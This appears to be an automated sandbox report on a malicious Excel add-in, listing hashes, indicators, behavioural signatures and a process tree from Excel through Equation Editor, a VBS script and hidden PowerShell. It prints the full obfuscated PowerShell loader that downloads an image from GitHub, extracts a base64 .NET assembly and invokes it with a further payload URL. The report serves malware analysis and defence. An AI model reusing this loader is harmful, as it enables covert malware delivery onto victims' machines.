Analysis
Max time kernel: 61s
Max time network: 18s
Platform: windows7_x64
Resource: win7-20241010-en
Resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
Submitted: 13/10/2024, 01:58
Static task: static1
Behavioral task: behavioral1
- Sample: f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
- Resource: win7-20241010-en
Behavioral task: behavioral2
- Sample: f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
- Resource: win10v2004-20241007-en
General
Target: f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam
Size: 736KB
MD5: 7c34b23b4b7cb66c2393128c3f55a0e1
SHA1: 2cf918f985476c7d3988b7d2ac530d32c59de12d
SHA256: f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086
SHA512: cd2d8d1f2e3accb677bed9be2a335253240458babedb514d88f31e980ed2740ebe586463fecf06ce5e3670ac430b1c54faf48732d29a98abeca28dae9daf537b
SSDEEP: 12288:4gDGK/3uJ3WSZvFsxoHXYo1NmcCYlnjeRKZLImngMVTGckDI:jqKg35DHoojmcCEnjeyLImnLVTv
Malware Config
Extracted URLs:
- https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
- https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20
Signatures

Blocklisted process makes network request (3 IoCs)
- flow 3, PID 2872, EQNEDT32.EXE
- flow 6, PID 2772, powershell.exe
- flow 7, PID 2772, powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Runs PowerShell and hides the display window.
- PID 2772, powershell.exe
- PID 2868, powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- flow 6: raw.githubusercontent.com
- flow 7: raw.githubusercontent.com
- flow 5: raw.githubusercontent.com

Drops file in System32 directory (2 IoCs)
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (EQNEDT32.EXE)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (WScript.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 1 IoC)
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor (EXCEL.EXE)

Launches Equation Editor (1 TTP, 1 IoC)
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
- PID 2872, EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoC)
- PID 2256, EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (2 IoCs)
- PID 2868, powershell.exe
- PID 2772, powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
- Token: SeDebugPrivilege, PID 2868, powershell.exe
- Token: SeDebugPrivilege, PID 2772, powershell.exe

Suspicious use of SetWindowsHookEx (3 IoCs)
- PID 2256, EXCEL.EXE
- PID 2256, EXCEL.EXE
- PID 2256, EXCEL.EXE

Suspicious use of WriteProcessMemory (12 IoCs)
- PID 2872 (EQNEDT32.EXE) wrote to memory of PID 2932, procid_target 31 (4 entries)
- PID 2932 (WScript.exe) wrote to memory of PID 2868, procid_target 32 (4 entries)
- PID 2868 (powershell.exe) wrote to memory of PID 2772, procid_target 34 (4 entries)
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f3ca53807f32ccbc241ce2b92d7ab0727cfdf45e3fd88b9e3ac9a063f0aff086.xlam1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID: 2256
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID: 2872
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mediciniiiiiffredating.vbs"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2932
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2868
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('yjLimageUrl = YqLhttps://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg YqL;yjLwebClient = New-Object System.Net.WebClie'+'nt;yjLimageB'+'ytes = yjLwebClient.DownloadData(yjLimageUrl);yjLimageText = [System.Text.Encoding]::UTF8.GetString(yjLimageBytes);yj'+'Lst'+'artFlag = YqL<<BASE64_START'+'>>YqL;yjLendFlag = YqL<<BASE64_END>>YqL;yjLstartIndex = yjLimageText.IndexOf(y'+'jLstartFlag);yjLendIndex = yjLimageText.IndexOf(yjLendFlag);yjLstartIndex -ge 0 -and yjLe'+'ndI'+'ndex -gt yjLstartIndex;yjLs'+'tartIndex += yjLstartFlag'+'.Length;yjLbase64Length = yjLendIndex - yjLstartIndex;yjLbase64Command = yjLimageText.Substring(yjLsta'+'rtIndex, yjLbase64Length'+');yjLcommandBytes = [System.Convert]::FromBase6'+'4String(yj'+'Lbas'+'e64Command);yjLloadedAssembly = [System.Reflection.Assembly]::Load(yjLco'+'mmandBytes);yjLvaiM'+'ethod = [dnlib.IO.Home].GetMethod(YqLVAIYqL);yjLvaiMethod.Invoke('+'yjLnull, '+'@(YqLtxt.44446esa'+'b'+'bbbbbewmadam/431.871.64.891//:ptthYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLdesativadoYqL, YqLAddInProcess32YqL, YqLdesativadoYqL, YqLdesativadoYqL));').RePlaCE('yjL','$').RePlaCE('YqL',[stRING][ChAr]39) | iex"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2772
Downloads

File: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 53143954570c9507ef372f2506c56772
SHA1: aed624cca6e5ff06c8eded5d06bd5d84db3c7c64
SHA256: 3568d8a5e8d5e26d16aaed26195aeee24cafb9b867de69d521f23336200641c0
SHA512: afce48ff53df539214002df623598bc961b42242ec1ab0778d2df1caf6b46a8cd75512628cc0e61370bb20a68ea85be7bda6447e9c7210ddda493b5be46d7554

Filesize: 189KB
MD5: ba21082c47f33b42f6243198bea92684
SHA1: d0a7314525f30708cffd5273feb1fc24ff33523c
SHA256: 6be117567324f1c1db4f2cbf48a25a3eaa24904238a37ab3b5e49b6970078b65
SHA512: dc21e6b490cb9f1b262622c28da8d8ce087bf1357b3f939f2e4fbe5339cd647045b4c89aeeb2543097b4b688643fead1547de59583659c16c5a8d0d530e54217